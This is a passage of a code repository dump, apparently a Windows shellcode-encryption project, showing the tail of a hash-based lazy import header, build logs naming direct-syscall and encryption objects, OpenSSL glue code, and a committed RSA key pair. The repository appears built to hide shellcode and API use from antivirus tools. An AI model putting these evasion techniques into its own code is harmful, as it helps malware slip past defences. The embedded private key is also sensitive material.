576 | auto function_hash = Hash;
577 |
578 | Enum e;
579 | do {
580 | name = e.value->BaseDllName;
581 | name.Length -= 8; // get rid of .dll extension
582 |
583 | if (!module_hash || hash(name) == module_hash) {
584 | const exports_directory exports(e.value->DllBase);
585 |
586 | if (exports) {
587 | auto export_index = exports.size();
588 | while (export_index--)
589 | if (hash(exports.name(export_index)) == function_hash) {
590 | const auto addr = exports.address(export_index);
591 |
592 | if (exports.is_forwarded(addr)) {
593 | auto hashes = hash_forwarded(
594 | reinterpret_cast(addr));
595 |
596 | function_hash = hashes.second;
597 | module_hash = hashes.first;
598 |
599 | e.reset();
600 | break;
601 | }
602 | return (F)(addr);
603 | }
604 | }
605 | }
606 | } while (e.next());
607 | return {};
608 | }
609 |
610 | template
611 | LAZY_IMPORTER_FORCEINLINE static F forwarded_safe() noexcept
612 | {
613 | return forwarded();
614 | }
615 |
616 | template
617 | LAZY_IMPORTER_FORCEINLINE static F forwarded_cached() noexcept
618 | {
619 | auto& value = base_type::_cache();
620 | if (!value)
621 | value = forwarded();
622 | return (F)(value);
623 | }
624 |
625 | template
626 | LAZY_IMPORTER_FORCEINLINE static F forwarded_safe_cached() noexcept
627 | {
628 | return forwarded_cached();
629 | }
630 |
631 | template
632 | LAZY_IMPORTER_FORCEINLINE static F in(Module m) noexcept
633 | {
634 | if (IsSafe && !m)
635 | return {};
636 |
637 | const exports_directory exports((const char*)(m));
638 | if (IsSafe && !exports)
639 | return {};
640 |
641 | for (unsigned long i{};; ++i) {
642 | if (IsSafe && i == exports.size())
643 | break;
644 |
645 | if (hash(exports.name(i)) == Hash)
646 | return (F)(exports.address(i));
647 | }
648 | return {};
649 | }
650 |
651 | template
652 | LAZY_IMPORTER_FORCEINLINE static F in_safe(Module m) noexcept
653 | {
654 | return in(m);
655 | }
656 |
657 | template
658 | LAZY_IMPORTER_FORCEINLINE static F in_cached(Module m) noexcept
659 | {
660 | auto& value = base_type::_cache();
661 | if (!value)
662 | value = in(m);
663 | return (F)(value);
664 | }
665 |
666 | template
667 | LAZY_IMPORTER_FORCEINLINE static F in_safe_cached(Module m) noexcept
668 | {
669 | return in_cached(m);
670 | }
671 |
672 | template
673 | LAZY_IMPORTER_FORCEINLINE static F nt() noexcept
674 | {
675 | return in(ldr_data_entry()->load_order_next()->DllBase);
676 | }
677 |
678 | template
679 | LAZY_IMPORTER_FORCEINLINE static F nt_safe() noexcept
680 | {
681 | return in_safe(ldr_data_entry()->load_order_next()->DllBase);
682 | }
683 |
684 | template
685 | LAZY_IMPORTER_FORCEINLINE static F nt_cached() noexcept
686 | {
687 | return in_cached(ldr_data_entry()->load_order_next()->DllBase);
688 | }
689 |
690 | template
691 | LAZY_IMPORTER_FORCEINLINE static F nt_safe_cached() noexcept
692 | {
693 | return in_safe_cached(ldr_data_entry()->load_order_next()->DllBase);
694 | }
695 | };
696 |
697 | }
698 | } // namespace li::detail
699 |
700 | #endif // include guard
701 |
--------------------------------------------------------------------------------
/aes加密/shellcode.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/shellcode.txt
--------------------------------------------------------------------------------
/aes加密/test.txt:
--------------------------------------------------------------------------------
1 | Hello World
--------------------------------------------------------------------------------
/aes加密/x64/Debug/Shellcode_AesEncrypt.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/x64/Debug/Shellcode_AesEncrypt.obj
--------------------------------------------------------------------------------
/aes加密/x64/Debug/aes加密.Build.CppClean.log:
--------------------------------------------------------------------------------
1 | e:\source code\c_code\shellcode加密\aes加密\x64\debug\vc143.pdb
2 | e:\source code\c_code\shellcode加密\aes加密\x64\debug\vc143.idb
3 | e:\source code\c_code\shellcode加密\aes加密\x64\debug\shellcode_aesencrypt.obj
4 | e:\source code\c_code\shellcode加密\aes加密\x64\debug\lazy_importer.obj
5 | e:\source code\c_code\shellcode加密\aes加密\x64\debug\syscalls.obj
6 | e:\source code\c_code\shellcode加密\aes加密\x64\debug\shellcode_aesdecrypt.obj
7 | e:\source code\c_code\shellcode加密\x64\debug\aes加密.exe
8 | e:\source code\c_code\shellcode加密\aes加密\x64\debug\aes加密.ilk
9 | e:\source code\c_code\shellcode加密\x64\debug\aes加密.pdb
10 | e:\source code\c_code\shellcode加密\aes加密\x64\debug\syscalls-asm.x64.obj
11 | e:\source code\c_code\shellcode加密\aes加密\x64\debug\aes加密.tlog\cl.command.1.tlog
12 | e:\source code\c_code\shellcode加密\aes加密\x64\debug\aes加密.tlog\cl.read.1.tlog
13 | e:\source code\c_code\shellcode加密\aes加密\x64\debug\aes加密.tlog\cl.write.1.tlog
14 | e:\source code\c_code\shellcode加密\aes加密\x64\debug\aes加密.tlog\link.command.1.tlog
15 | e:\source code\c_code\shellcode加密\aes加密\x64\debug\aes加密.tlog\link.read.1.tlog
16 | e:\source code\c_code\shellcode加密\aes加密\x64\debug\aes加密.tlog\link.write.1.tlog
17 | e:\source code\c_code\shellcode加密\aes加密\x64\debug\aes加密.tlog\masm.read.1u.tlog
18 | e:\source code\c_code\shellcode加密\aes加密\x64\debug\aes加密.tlog\masm.write.1u.tlog
19 |
--------------------------------------------------------------------------------
/aes加密/x64/Debug/aes加密.exe.recipe:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | E:\Source Code\C_code\shellcode加密\x64\Debug\aes加密.exe
6 |
7 |
8 |
9 |
10 |
11 |
--------------------------------------------------------------------------------
/aes加密/x64/Debug/aes加密.ilk:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/x64/Debug/aes加密.ilk
--------------------------------------------------------------------------------
/aes加密/x64/Debug/aes加密.log:
--------------------------------------------------------------------------------
1 | cl : 命令行 warning D9025: 正在重写“/sdl”(用“/GS-”)
2 | lazy_importer.cpp
3 | Shellcode_AesEncrypt.cpp
4 | E:\Source Code\C_code\shellcode加密\aes加密\Shellcode_AesEncrypt.cpp(58,12): warning C4244: “参数”: 从“time_t”转换到“unsigned int”,可能丢失数据
5 | 正在生成代码...
6 | aes加密.vcxproj -> E:\Source Code\C_code\shellcode加密\x64\Debug\aes加密.exe
7 | E:\vcpkg\scripts\buildsystems\msbuild\vcpkg.targets(228,5): warning : [vcpkg] Failed to gather app local DLL dependencies, program may not run. Set VcpkgApplocalDeps to false in your project file to suppress this warning. PowerShell arguments: -ExecutionPolicy Bypass -noprofile -File "E:\vcpkg\scripts\buildsystems\msbuild\applocal.ps1" "E:\Source Code\C_code\shellcode加密\x64\Debug\aes加密.exe" "E:\vcpkg\installed\x64-windows\debug\bin" "x64\Debug\aes加密.tlog\aes加密.write.1u.tlog" "x64\Debug\vcpkg.applocal.log"
8 |
--------------------------------------------------------------------------------
/aes加密/x64/Debug/aes加密.tlog/CL.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/x64/Debug/aes加密.tlog/CL.command.1.tlog
--------------------------------------------------------------------------------
/aes加密/x64/Debug/aes加密.tlog/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/x64/Debug/aes加密.tlog/CL.read.1.tlog
--------------------------------------------------------------------------------
/aes加密/x64/Debug/aes加密.tlog/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/x64/Debug/aes加密.tlog/CL.write.1.tlog
--------------------------------------------------------------------------------
/aes加密/x64/Debug/aes加密.tlog/aes加密.lastbuildstate:
--------------------------------------------------------------------------------
1 | PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.35.32215:TargetPlatformVersion=10.0.22621.0:VcpkgTriplet=x64-windows:
2 | Debug|x64|E:\Source Code\C_code\shellcode加密\|
3 |
--------------------------------------------------------------------------------
/aes加密/x64/Debug/aes加密.tlog/link.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/x64/Debug/aes加密.tlog/link.command.1.tlog
--------------------------------------------------------------------------------
/aes加密/x64/Debug/aes加密.tlog/link.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/x64/Debug/aes加密.tlog/link.read.1.tlog
--------------------------------------------------------------------------------
/aes加密/x64/Debug/aes加密.tlog/link.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/x64/Debug/aes加密.tlog/link.write.1.tlog
--------------------------------------------------------------------------------
/aes加密/x64/Debug/aes加密.vcxproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/x64/Debug/aes加密.vcxproj.FileListAbsolute.txt
--------------------------------------------------------------------------------
/aes加密/x64/Debug/lazy_importer.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/x64/Debug/lazy_importer.obj
--------------------------------------------------------------------------------
/aes加密/x64/Debug/vc143.idb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/x64/Debug/vc143.idb
--------------------------------------------------------------------------------
/aes加密/x64/Debug/vc143.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/x64/Debug/vc143.pdb
--------------------------------------------------------------------------------
/aes加密/x64/Debug/vcpkg.applocal.log:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/aes加密/x64/Release/Shellcode_AesDecrypt.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/x64/Release/Shellcode_AesDecrypt.obj
--------------------------------------------------------------------------------
/aes加密/x64/Release/Shellcode_AesEncrypt.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/x64/Release/Shellcode_AesEncrypt.obj
--------------------------------------------------------------------------------
/aes加密/x64/Release/aes加密.Build.CppClean.log:
--------------------------------------------------------------------------------
1 | e:\source code\c_code\shellcode加密\aes加密\x64\release\vc143.pdb
2 | e:\source code\c_code\shellcode加密\aes加密\x64\release\lazy_importer.obj
3 | e:\source code\c_code\shellcode加密\aes加密\x64\release\shellcode_aesdecrypt.obj
4 | e:\source code\c_code\shellcode加密\aes加密\x64\release\syscalls.obj
5 | e:\source code\c_code\shellcode加密\aes加密\x64\release\shellcode_aesencrypt.obj
6 | e:\source code\c_code\shellcode加密\x64\release\aes加密.exe
7 | e:\source code\c_code\shellcode加密\x64\release\aes加密.pdb
8 | e:\source code\c_code\shellcode加密\aes加密\x64\release\aes加密.iobj
9 | e:\source code\c_code\shellcode加密\aes加密\x64\release\syscalls-asm.x64.obj
10 | e:\source code\c_code\shellcode加密\aes加密\x64\release\aes加密.ipdb
11 | e:\source code\c_code\shellcode加密\aes加密\x64\release\aes加密.tlog\cl.command.1.tlog
12 | e:\source code\c_code\shellcode加密\aes加密\x64\release\aes加密.tlog\cl.read.1.tlog
13 | e:\source code\c_code\shellcode加密\aes加密\x64\release\aes加密.tlog\cl.write.1.tlog
14 | e:\source code\c_code\shellcode加密\aes加密\x64\release\aes加密.tlog\link.command.1.tlog
15 | e:\source code\c_code\shellcode加密\aes加密\x64\release\aes加密.tlog\link.read.1.tlog
16 | e:\source code\c_code\shellcode加密\aes加密\x64\release\aes加密.tlog\link.write.1.tlog
17 | e:\source code\c_code\shellcode加密\aes加密\x64\release\aes加密.tlog\masm.read.1u.tlog
18 | e:\source code\c_code\shellcode加密\aes加密\x64\release\aes加密.tlog\masm.write.1u.tlog
19 |
--------------------------------------------------------------------------------
/aes加密/x64/Release/aes加密.exe.recipe:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | E:\Source Code\C_code\shellcode加密\x64\Release\aes加密.exe
6 |
7 |
8 |
9 |
10 |
11 |
--------------------------------------------------------------------------------
/aes加密/x64/Release/aes加密.iobj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/x64/Release/aes加密.iobj
--------------------------------------------------------------------------------
/aes加密/x64/Release/aes加密.ipdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/x64/Release/aes加密.ipdb
--------------------------------------------------------------------------------
/aes加密/x64/Release/aes加密.log:
--------------------------------------------------------------------------------
1 | cl : 命令行 warning D9025: 正在重写“/sdl”(用“/GS-”)
2 | Shellcode_AesEncrypt.cpp
3 | E:\Source Code\C_code\shellcode加密\aes加密\Shellcode_AesEncrypt.cpp(50,12): warning C4244: “参数”: 从“time_t”转换到“unsigned int”,可能丢失数据
4 | E:\Source Code\C_code\shellcode加密\aes加密\Shellcode_AesEncrypt.cpp(62,9): warning C4477: “printf”: 格式字符串“%d”需要类型“int”的参数,但可变参数 1 拥有了类型“size_t”
5 | E:\Source Code\C_code\shellcode加密\aes加密\Shellcode_AesEncrypt.cpp(62,9): message : 请考虑在格式字符串中使用“%zd”
6 | E:\Source Code\C_code\shellcode加密\aes加密\Shellcode_AesEncrypt.cpp(59,7): warning C4996: 'fopen': This function or variable may be unsafe. Consider using fopen_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
7 | 正在生成代码
8 | 1 of 143 functions ( 0.7%) were compiled, the rest were copied from previous compilation.
9 | 0 functions were new in current compilation
10 | 0 functions had inline decision re-evaluated but remain unchanged
11 | 已完成代码的生成
12 | aes加密.vcxproj -> E:\Source Code\C_code\shellcode加密\x64\Release\aes加密.exe
13 | E:\vcpkg\scripts\buildsystems\msbuild\vcpkg.targets(228,5): warning : [vcpkg] Failed to gather app local DLL dependencies, program may not run. Set VcpkgApplocalDeps to false in your project file to suppress this warning. PowerShell arguments: -ExecutionPolicy Bypass -noprofile -File "E:\vcpkg\scripts\buildsystems\msbuild\applocal.ps1" "E:\Source Code\C_code\shellcode加密\x64\Release\aes加密.exe" "E:\vcpkg\installed\x64-windows\bin" "x64\Release\aes加密.tlog\aes加密.write.1u.tlog" "x64\Release\vcpkg.applocal.log"
14 |
--------------------------------------------------------------------------------
/aes加密/x64/Release/aes加密.tlog/CL.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/x64/Release/aes加密.tlog/CL.command.1.tlog
--------------------------------------------------------------------------------
/aes加密/x64/Release/aes加密.tlog/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/x64/Release/aes加密.tlog/CL.read.1.tlog
--------------------------------------------------------------------------------
/aes加密/x64/Release/aes加密.tlog/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/x64/Release/aes加密.tlog/CL.write.1.tlog
--------------------------------------------------------------------------------
/aes加密/x64/Release/aes加密.tlog/Masm.read.1u.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/x64/Release/aes加密.tlog/Masm.read.1u.tlog
--------------------------------------------------------------------------------
/aes加密/x64/Release/aes加密.tlog/Masm.write.1u.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/x64/Release/aes加密.tlog/Masm.write.1u.tlog
--------------------------------------------------------------------------------
/aes加密/x64/Release/aes加密.tlog/aes加密.lastbuildstate:
--------------------------------------------------------------------------------
1 | PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.35.32215:TargetPlatformVersion=10.0.22621.0:VcpkgTriplet=x64-windows:
2 | Release|x64|E:\Source Code\C_code\shellcode加密\|
3 |
--------------------------------------------------------------------------------
/aes加密/x64/Release/aes加密.tlog/link.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/x64/Release/aes加密.tlog/link.command.1.tlog
--------------------------------------------------------------------------------
/aes加密/x64/Release/aes加密.tlog/link.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/x64/Release/aes加密.tlog/link.read.1.tlog
--------------------------------------------------------------------------------
/aes加密/x64/Release/aes加密.tlog/link.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/x64/Release/aes加密.tlog/link.write.1.tlog
--------------------------------------------------------------------------------
/aes加密/x64/Release/aes加密.vcxproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/x64/Release/aes加密.vcxproj.FileListAbsolute.txt
--------------------------------------------------------------------------------
/aes加密/x64/Release/lazy_importer.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/x64/Release/lazy_importer.obj
--------------------------------------------------------------------------------
/aes加密/x64/Release/syscalls-asm.x64.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/x64/Release/syscalls-asm.x64.obj
--------------------------------------------------------------------------------
/aes加密/x64/Release/syscalls.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/x64/Release/syscalls.obj
--------------------------------------------------------------------------------
/aes加密/x64/Release/vc143.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/x64/Release/vc143.pdb
--------------------------------------------------------------------------------
/aes加密/x64/Release/vcpkg.applocal.log:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/rsa加密/applink.c:
--------------------------------------------------------------------------------
1 | /*
2 | * Copyright 2004-2021 The OpenSSL Project Authors. All Rights Reserved.
3 | *
4 | * Licensed under the Apache License 2.0 (the "License"). You may not use
5 | * this file except in compliance with the License. You can obtain a copy
6 | * in the file LICENSE in the source distribution or at
7 | * https://www.openssl.org/source/license.html
8 | */
9 |
10 | #define APPLINK_STDIN 1
11 | #define APPLINK_STDOUT 2
12 | #define APPLINK_STDERR 3
13 | #define APPLINK_FPRINTF 4
14 | #define APPLINK_FGETS 5
15 | #define APPLINK_FREAD 6
16 | #define APPLINK_FWRITE 7
17 | #define APPLINK_FSETMOD 8
18 | #define APPLINK_FEOF 9
19 | #define APPLINK_FCLOSE 10 /* should not be used */
20 |
21 | #define APPLINK_FOPEN 11 /* solely for completeness */
22 | #define APPLINK_FSEEK 12
23 | #define APPLINK_FTELL 13
24 | #define APPLINK_FFLUSH 14
25 | #define APPLINK_FERROR 15
26 | #define APPLINK_CLEARERR 16
27 | #define APPLINK_FILENO 17 /* to be used with below */
28 |
29 | #define APPLINK_OPEN 18 /* formally can't be used, as flags can vary */
30 | #define APPLINK_READ 19
31 | #define APPLINK_WRITE 20
32 | #define APPLINK_LSEEK 21
33 | #define APPLINK_CLOSE 22
34 | #define APPLINK_MAX 22 /* always same as last macro */
35 |
36 | #ifndef APPMACROS_ONLY
37 | # include
38 | # include
39 | # include
40 |
41 | # ifdef __BORLANDC__
42 | /* _lseek in is a function-like macro so we can't take its address */
43 | # undef _lseek
44 | # define _lseek lseek
45 | # endif
46 |
47 | static void *app_stdin(void)
48 | {
49 | return stdin;
50 | }
51 |
52 | static void *app_stdout(void)
53 | {
54 | return stdout;
55 | }
56 |
57 | static void *app_stderr(void)
58 | {
59 | return stderr;
60 | }
61 |
62 | static int app_feof(FILE *fp)
63 | {
64 | return feof(fp);
65 | }
66 |
67 | static int app_ferror(FILE *fp)
68 | {
69 | return ferror(fp);
70 | }
71 |
72 | static void app_clearerr(FILE *fp)
73 | {
74 | clearerr(fp);
75 | }
76 |
77 | static int app_fileno(FILE *fp)
78 | {
79 | return _fileno(fp);
80 | }
81 |
82 | static int app_fsetmod(FILE *fp, char mod)
83 | {
84 | return _setmode(_fileno(fp), mod == 'b' ? _O_BINARY : _O_TEXT);
85 | }
86 |
87 | #ifdef __cplusplus
88 | extern "C" {
89 | #endif
90 |
91 | __declspec(dllexport)
92 | void **
93 | # if defined(__BORLANDC__)
94 | /*
95 | * __stdcall appears to be the only way to get the name
96 | * decoration right with Borland C. Otherwise it works
97 | * purely incidentally, as we pass no parameters.
98 | */
99 | __stdcall
100 | # else
101 | __cdecl
102 | # endif
103 | OPENSSL_Applink(void)
104 | {
105 | static int once = 1;
106 | static void *OPENSSL_ApplinkTable[APPLINK_MAX + 1] =
107 | { (void *)APPLINK_MAX };
108 |
109 | if (once) {
110 | OPENSSL_ApplinkTable[APPLINK_STDIN] = app_stdin;
111 | OPENSSL_ApplinkTable[APPLINK_STDOUT] = app_stdout;
112 | OPENSSL_ApplinkTable[APPLINK_STDERR] = app_stderr;
113 | OPENSSL_ApplinkTable[APPLINK_FPRINTF] = fprintf;
114 | OPENSSL_ApplinkTable[APPLINK_FGETS] = fgets;
115 | OPENSSL_ApplinkTable[APPLINK_FREAD] = fread;
116 | OPENSSL_ApplinkTable[APPLINK_FWRITE] = fwrite;
117 | OPENSSL_ApplinkTable[APPLINK_FSETMOD] = app_fsetmod;
118 | OPENSSL_ApplinkTable[APPLINK_FEOF] = app_feof;
119 | OPENSSL_ApplinkTable[APPLINK_FCLOSE] = fclose;
120 |
121 | OPENSSL_ApplinkTable[APPLINK_FOPEN] = fopen;
122 | OPENSSL_ApplinkTable[APPLINK_FSEEK] = fseek;
123 | OPENSSL_ApplinkTable[APPLINK_FTELL] = ftell;
124 | OPENSSL_ApplinkTable[APPLINK_FFLUSH] = fflush;
125 | OPENSSL_ApplinkTable[APPLINK_FERROR] = app_ferror;
126 | OPENSSL_ApplinkTable[APPLINK_CLEARERR] = app_clearerr;
127 | OPENSSL_ApplinkTable[APPLINK_FILENO] = app_fileno;
128 |
129 | OPENSSL_ApplinkTable[APPLINK_OPEN] = _open;
130 | OPENSSL_ApplinkTable[APPLINK_READ] = _read;
131 | OPENSSL_ApplinkTable[APPLINK_WRITE] = _write;
132 | OPENSSL_ApplinkTable[APPLINK_LSEEK] = _lseek;
133 | OPENSSL_ApplinkTable[APPLINK_CLOSE] = _close;
134 |
135 | once = 0;
136 | }
137 |
138 | return OPENSSL_ApplinkTable;
139 | }
140 |
141 | #ifdef __cplusplus
142 | }
143 | #endif
144 | #endif
145 |
--------------------------------------------------------------------------------
/rsa加密/libcrypto-3-x64.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/rsa加密/libcrypto-3-x64.dll
--------------------------------------------------------------------------------
/rsa加密/main.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/rsa加密/main.cpp
--------------------------------------------------------------------------------
/rsa加密/private.pem:
--------------------------------------------------------------------------------
1 | -----BEGIN RSA PRIVATE KEY-----
2 | MIIEpAIBAAKCAQEA4P0HkHnwILoW2osYJouoW2CT/wHMrdA9AyBlgGD3KJQ7MBAk
3 | thweBzbp3KNDCOA8YPVlXABcJ14GiSmR2DJ4iJiK/MR0rvi9Z1L/6B8TpeiKCbyw
4 | dHheMhh6sZfyRd598aTA+MTvwuZTcuBsplv7ZTI/K7ydLFLxAhz+UfrL/A2T/dj+
5 | FVQaAK51RXg1182Cnc/+9fDcVDlkv6ZUZF83ojuSW4cxDVqGsm8E2Lr87T+KyVnv
6 | l1EREUyod3QSw9SPwt1X5nF5NeY8Uuo1xTpFrt99TY7uTQgOrhUO374JXfO+zlIg
7 | Qy1Em8BqZGp3QgUC7CDGwrBHQEhQZf+dFNNscwIDAQABAoIBACC+cpViScJZku3n
8 | hHJHrQ7vdVqNpn49akPEOUF/2zi6qgqKru0aFnyyT0LfN+hYyjDKRiAnpUHNe2IG
9 | /MTcQ5KNsNysstasONSKzde4fiGNQFm+bmflBMCBs4mZNZdZlDbQ5YzPDJ3u64Iy
10 | i12C0Yme0HbLEoza3VyTX6gKuhlKkr34WoYGU773osEBbZUQqkFsGoxIsabQ2zN4
11 | iV7zquGROtACd0FONtbGY9bEo9VYIMh0uzNCdKopojoSX+l9YN8bd78kJZA4A51c
12 | NNMFyMBhOH328IvZCjcauO7Fwf56oatAPCVAQZfSuisfPK4xxlpunOVpmxOsUT3W
13 | p5A5AEECgYEA8EH2diHpUPdIxHAjMm7WEDsLas2gsgajjYFdjxp5HwtzbSdDIRR6
14 | 9sfVMTRtm7+195mzx3+VwFI/rbjIM9Tm5REcjWm/IJQJipit4r0FveIihIga7qK3
15 | WkMI7xr0lTW55mk4S1i/QGxCLgBlIQynHEXBDyvyX+wsT0tRtz1DjEMCgYEA77rx
16 | Yx2/ceEZojcUGTDdROqfU1r0KNAs15w7OH/tPW8b+7rcbQ836mT1Va1qPklKf1zO
17 | lj6NNNDrCxJJ572P0wx2lQ8jfBreQWRaOBr6FDjndoMDNAktz6FK7cCikZ8Ax4rk
18 | 614nMJOmw7jZ6jgzGnIQSet9NMEmVwqveHjotBECgYBV9rQRlpadoq0FpD3juKad
19 | DhNKtqJNsHRqmCP6pPU7d2RoZMjvGB3bGKsePO0O8ixQmE0sD2lsc8FXDiuL6Bxp
20 | T5MQwgphxLYZQgHNg+Z/B19kXjKMuemywRN8Qf/LN3r5hyJeSzW6/kE7pmaIybct
21 | NYQbQpUpXx6HjKKDVsdJcwKBgQDfXGjoFqF3c2o0z+i0B+lB+vDz8zymgkAlq/Up
22 | kVfz84A5LUOPgaxxghtr9qWU3yjAPjJlnmZmnXlB2YpulxpYY7Zg77f6O/Z1KxE8
23 | UTZMfTB8JVlotFywpfFwUBmoYGOTh//+pL0S759joOm45yAGNdyjYvxHmOcmFlij
24 | gNQgYQKBgQCHtynyLxjgmRb1wzcZsOR0DH0XjadopYL+exmlKq57BU8iKBzK4Dzl
25 | DGW3gS4xGiJ0/hr1rF05UQPo2/TRcQFmRfQtBXftGvUfpcRACfzRmceuxgoPjXqm
26 | dNJTLn/6g5tXuHbjUq9w4BgorIT4CNecOIUugybLeXqzqAnzKOW1Bw==
27 | -----END RSA PRIVATE KEY-----
28 |
--------------------------------------------------------------------------------
/rsa加密/public.pem:
--------------------------------------------------------------------------------
1 | -----BEGIN RSA PUBLIC KEY-----
2 | MIIBCgKCAQEA4P0HkHnwILoW2osYJouoW2CT/wHMrdA9AyBlgGD3KJQ7MBAkthwe
3 | Bzbp3KNDCOA8YPVlXABcJ14GiSmR2DJ4iJiK/MR0rvi9Z1L/6B8TpeiKCbywdHhe
4 | Mhh6sZfyRd598aTA+MTvwuZTcuBsplv7ZTI/K7ydLFLxAhz+UfrL/A2T/dj+FVQa
5 | AK51RXg1182Cnc/+9fDcVDlkv6ZUZF83ojuSW4cxDVqGsm8E2Lr87T+KyVnvl1ER
6 | EUyod3QSw9SPwt1X5nF5NeY8Uuo1xTpFrt99TY7uTQgOrhUO374JXfO+zlIgQy1E
7 | m8BqZGp3QgUC7CDGwrBHQEhQZf+dFNNscwIDAQAB
8 | -----END RSA PUBLIC KEY-----
9 |
--------------------------------------------------------------------------------
/rsa加密/rsa加密.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | Win32Proj
24 | {1f7476fa-60c8-4f91-8fd5-c5e31d3a6888}
25 | rsa加密
26 | 10.0
27 |
28 |
29 |
30 | Application
31 | true
32 | v143
33 | Unicode
34 |
35 |
36 | Application
37 | false
38 | v143
39 | true
40 | Unicode
41 |
42 |
43 | Application
44 | true
45 | v143
46 | Unicode
47 |
48 |
49 | Application
50 | false
51 | v143
52 | true
53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
